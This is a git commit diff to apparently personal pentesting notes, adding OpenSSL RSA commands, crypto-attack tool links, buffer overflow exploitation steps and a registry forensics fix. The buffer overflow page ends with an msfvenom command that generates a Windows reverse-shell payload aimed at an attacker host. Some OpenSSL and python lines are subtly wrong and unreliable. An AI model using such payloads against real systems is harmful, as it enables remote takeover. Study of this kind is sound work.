added cheat sheet to windows forensics

Cryptography/OpenSSL-Cheatsheet.md

@@ -21,3 +21,24 @@ openssl pkcs12 -export -out *.pfx -in temp.pem
 ```sh
 openssl req -new -x509 -keyout cert.pem -out cert.pem -days 365 -nodes
 ```
+## RSA
+
+### Decrypt RSA
+
+* Decrypt a RSA cipher with the private key
+```sh
+openssl pkeyutl -decrypt -in $CIPHER -out $CLEAR_TEXT -inkey $PRIVATE_KEY
+```
+
+* Deprecated version of RSA decryption is the following
+```sh
+openssl rsautl -decrypt -in $CIPHER -out $CLEAR_TEXT -inkey $PRIVATE_KEY
+```
+
+### Encrypt RSA
+
+* Encrypt RSA current and deprecated
+```sh
+openssl pkeyutl -encrypt -in $CLEAR_TEXT -out $CLEAR_TEXT -pubin -inkey $PRIVATE_KEY
+openssl rsautl -encrypt -in $CLEAR_TEXT -out $ENCRYPTED -pubin -inkey $PRIVATE_KEY
+```

Cryptography/References.md

@@ -0,0 +1,6 @@
+# Cryptography References
+
+## Tools
+
+* [RsaCtfTool](https://github.com/RsaCtfTool/RsaCtfTool.git)
+* [featherduster](https://github.com/nccgroup/featherduster.git)

Exploits/Binaries/Buffer Overflow.md

@@ -1,13 +1,16 @@
 # Buffer Overflow
+
 * [Cheat Sheet](https://github.com/Tib3rius/Pentest-Cheatsheets/blob/master/exploits/buffer-overflows.rst)
 
 # Usage
+
 * Fuzz & crash the binary pretty roughly via payload 
 ```sh
 python -c "print('A' * 3000)
 ```
 
 ## Fuzzing 
+
 * python 3
 ../fuzzer.py
 
@@ -15,18 +18,33 @@ python -c "print('A' * 3000)
 ../fuzzer2.py
 
 ## Measure Offset
+
+### Metasploit
 * Use as payload
 ```sh
 /opt/metasploit/tools/exploit/pattern_create.rb -l <bufferlength>
 ```
+
 * Find content of the payload at EIP and identify exact bufferlength
 ```sh
 /opt/metasploit/tools/exploit/pattern_offset.rb -l <bufferlength> -q <EIP-content>
 ```
+
+### Gef
+
+```sh
+file <filename>
+pattern create
+pattern search <Pattern found in $rbx>
 ```
+
+### Infinity Debugger
+
+```sh
 msf-pattern_offset -l <bufferlength> -q <EIP>
 ```
-```
+
+```sh
 mona msfpattern -l <bufferlength>
 ```
 * Fill offset variable in exploit `buffer_overflow.py`
@@ -35,6 +53,7 @@ mona msfpattern -l <bufferlength>
 * Execute buffer_overflow.py, EIP should contain `BBBB`
 
 ## Find bad characters to input in the buffer
+
 * Execute `bad_chars.py` and include it as payload. Always excluded is `\x00`.
 ../bad_chars.py
 
@@ -45,9 +64,11 @@ mona msfpattern -l <bufferlength>
 ```
 
 ## Find Jump Point / RoP 
+
 * Jump point to `ESP` (32 bit binary) needs to be found to put it inside `EIP`
 
 ### Example: Immunity Debugger using mona on windows machine
+
 ```sh
 !mona modules
 ```
@@ -57,6 +78,7 @@ mona msfpattern -l <bufferlength>
 * The found address needs to be **LITTLE ENDIAN NOTATION INSIDE THE EIP VARIABLE** if x86/amd64
 
 ## Shellcode as Payload
+
 * Last part is the individual shellcode, put it in the payload variable of `buffer_overflow.py`
 ```sh
 msfvenom -p windows/shell_reverse_tcp LHOST=<attacker-ip> LPORT=<attacker-port> -f c -e x86/shikata_ga_nai -b "\x00"

Exploits/References.md

@@ -18,6 +18,11 @@
 
 * [ropstar](https://github.com/xct/ropstar.git)
 
+## Cryptography
+
+* [RsaCtfTool](https://github.com/RsaCtfTool/RsaCtfTool.git)
+* [featherduster](https://github.com/nccgroup/featherduster.git)
+
 ## Windows
 
 * [crackmapexec](https://github.com/Porchetta-Industries/CrackMapExec.git)

Forensics/Windows Registration.md

@@ -1,11 +1,13 @@
 # Windows Registry
 
+* [Windows Forensics Cheat Sheet](https://user-images.githubusercontent.com/58165365/157232143-3c8785ec-164b-4843-bde8-9d9a22350159.png)
+
 ## Regedit Keys
 * HKEY_CURRENT_USER (HKCU), inside HKU
 * HKEY_USERS (HKU)
 * HKEY_LOCAL_MACHINE (HKLM)
 * HKEY_CLASSES_ROOT (HKCR), stored in HKLM and HKU
-    * `HKEY_CURREN_USER\Software\Classes` for settings of interactive user
+    * `HKEY_CURRENT_USER\Software\Classes` for settings of interactive user
     * `HKEY_LOCAL_MACHINE\Software\Classes` to change default settings
 * HKEY_CURRENT_CONFIG